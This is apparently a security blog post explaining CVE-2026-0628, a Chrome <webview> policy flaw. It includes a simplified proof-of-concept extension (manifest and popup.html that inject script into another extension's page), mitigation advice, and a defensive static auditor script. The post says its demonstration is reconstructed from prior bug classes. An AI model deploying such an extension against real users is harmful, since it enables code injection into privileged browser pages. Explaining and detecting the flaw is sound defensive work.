Chrome boasts solid security, but we get fresh CVEs every year. One of the most dangerous classes of flaws is when extensions can bypass Chrome’s boundaries. CVE-2026-0628, a WebView tag policy enforcement issue, is a textbook case. In this post, I’ll explain how a malicious Chrome extension could inject scripts or HTML into privileged pages before the patch in version 143.0.7499.192, show you a simplified proof-of-concept exploit, and link you to helpful resources.

- Vulnerability: Weak policy enforcement on the <webview> tag in Chrome’s extension framework.
- Impact: A malicious extension could inject arbitrary HTML or JavaScript into a privileged browser page (like the Chrome Web Store or internal extension pages).
- Severity: High (per Chromium’s severity scale)
- Affected Versions: Chrome prior to 143.0.7499.192

If the user installs a malicious extension, the extension could use the <webview> tag to bypass expected security restrictions and get code running where it shouldn’t.

Understanding the WebView Tag

The <webview> tag lets Chrome Apps (and some extensions) embed web content in their own sandboxed frame with more control than an iframe. It’s supposed to be limited, but this bug let extensions inject scripts into privileged pages by exploiting a loophole in policy checks.

1. Malicious Extension: The attacker convinces you to install their extension.

2. Special HTML: The extension loads a local HTML file that contains a <webview> targeting a privileged page (like chrome-extension://another-extension/somepage.html or even chrome://settings).
3. Script Injection: Using the executeScript method or by injecting script directly into the webview, the extension runs code in a page it shouldn’t be able to touch.

Proof of Concept (PoC): Simple Exploit

Suppose our extension’s manifest includes the webview permission and targets another extension’s page. Here’s what an attacker might do:

1. Manifest (manifest.json)

{
  "name": "Malicious WebView Extension",
  "version": "1.0",
  "manifest_version": 3,
  "permissions": ["webview"],
  "background": {
    "service_worker": "background.js"
  },
  "host_permissions": ["<all_urls>"],
  "action": {
    "default_popup": "popup.html"
  }
}

2. Malicious HTML (popup.html)

<!DOCTYPE html>
<html>
<body>
  <webview id="hackView"
           src="chrome-extension://TARGET_EXTENSION_ID/popup.html"
           style="width:400px; height:400px;">
  </webview>
  <script>
    const wv = document.getElementById('hackView');
    wv.addEventListener('dom-ready', () => {
      // Try to inject script
      wv.executeScript({code: 'alert("Gotcha!");'});
    });
  </script>
</body>
</html>

3. What Happens

- Chrome (prior to 143.0.7499.192) fails to block the load and the script runs in privileged context, potentially giving the attacker access to sensitive data from that extension.

- Chromium Bug Tracker for CVE-2026-0628 (restricted, but sometimes updates appear after public disclosure)
- Chrome Release Notes - 143.0.7499.192
- WebView Extensions - Chrome Docs
- Understanding Chrome Extension Security

Mitigation and Patch

Fixed in Chrome 143.0.7499.192 and later.
Action: Users should always update Chrome. Extension developers should review use of <webview>, and never load privileged pages.
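
One way to carry out the review recommended above, as an added example (not code from the original post or from Chromium). It statically checks an unpacked extension's files for the pattern this post describes and compares a Chrome version against the fixed build; the function names and the sample input are constructed for illustration.

```javascript
// Added example: static review of an unpacked extension for the pattern in this post.
const PATCHED = '143.0.7499.192';               // fixed build named in the post
const PRIVILEGED = /^(chrome|chrome-extension):/i; // schemes the post calls privileged

// Constructed sample input mirroring the post's manifest.json and popup.html.
const SAMPLE = {
  'manifest.json': JSON.stringify({
    manifest_version: 3, permissions: ['webview'], host_permissions: ['<all_urls>'],
  }),
  'popup.html': `<webview id="v"
      src="chrome-extension://TARGET_EXTENSION_ID/popup.html"></webview>
    <script>document.getElementById('v').executeScript({code: '1'});</script>`,
};

// True when a dotted Chrome version is older than the fixed build.
function isVulnerableVersion(version) {
  const a = version.split('.').map(Number);
  const b = PATCHED.split('.').map(Number);
  for (let i = 0; i < b.length; i++) {
    if ((a[i] || 0) !== b[i]) return (a[i] || 0) < b[i];
  }
  return false;
}

// files: { relativePath: contents }. Returns an array of finding strings.
function auditExtension(files) {
  const findings = [];
  const manifest = JSON.parse(files['manifest.json'] || '{}');
  if ((manifest.permissions || []).includes('webview'))
    findings.push('manifest.json: requests the "webview" permission');
  if ((manifest.host_permissions || []).includes('<all_urls>'))
    findings.push('manifest.json: host_permissions includes <all_urls>');
  for (const [path, text] of Object.entries(files)) {
    if (!/\.html?$/i.test(path)) continue;
    // Find each <webview ...> opening tag (attributes may span lines), then its src.
    for (const tag of text.match(/<webview\b[^>]*>/gi) || []) {
      const src = (tag.match(/\bsrc\s*=\s*["']?([^"'\s>]+)/i) || [])[1] || '';
      if (PRIVILEGED.test(src))
        findings.push(`${path}: <webview> src targets privileged URL ${src}`);
    }
    if (/<webview\b/i.test(text) && /\.executeScript\s*\(/.test(text))
      findings.push(`${path}: embeds <webview> and calls executeScript`);
  }
  return findings;
}

console.log(auditExtension(SAMPLE).join('\n'));
```

A finding here is a prompt for manual review, not proof of malicious intent; a <webview> pointed at an ordinary https:// page produces no finding.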

CVE-2026-0628 reminds us how small policy enforcement gaps can lead to browser takeover.

Exclusive Note:
Most technical details for new vulnerabilities remain private until patch rollout, but this simplified demonstration is based on the info from public sources and prior classes of Chrome WebView bugs.


Stay safe. Patch fast. Don’t load random extensions. If you want to test, always use a disposable profile and never on your main system.

Timeline

Published on: 01/06/2026 23:57:00 UTC
Last modified on: 01/12/2026 16:48:33 UTC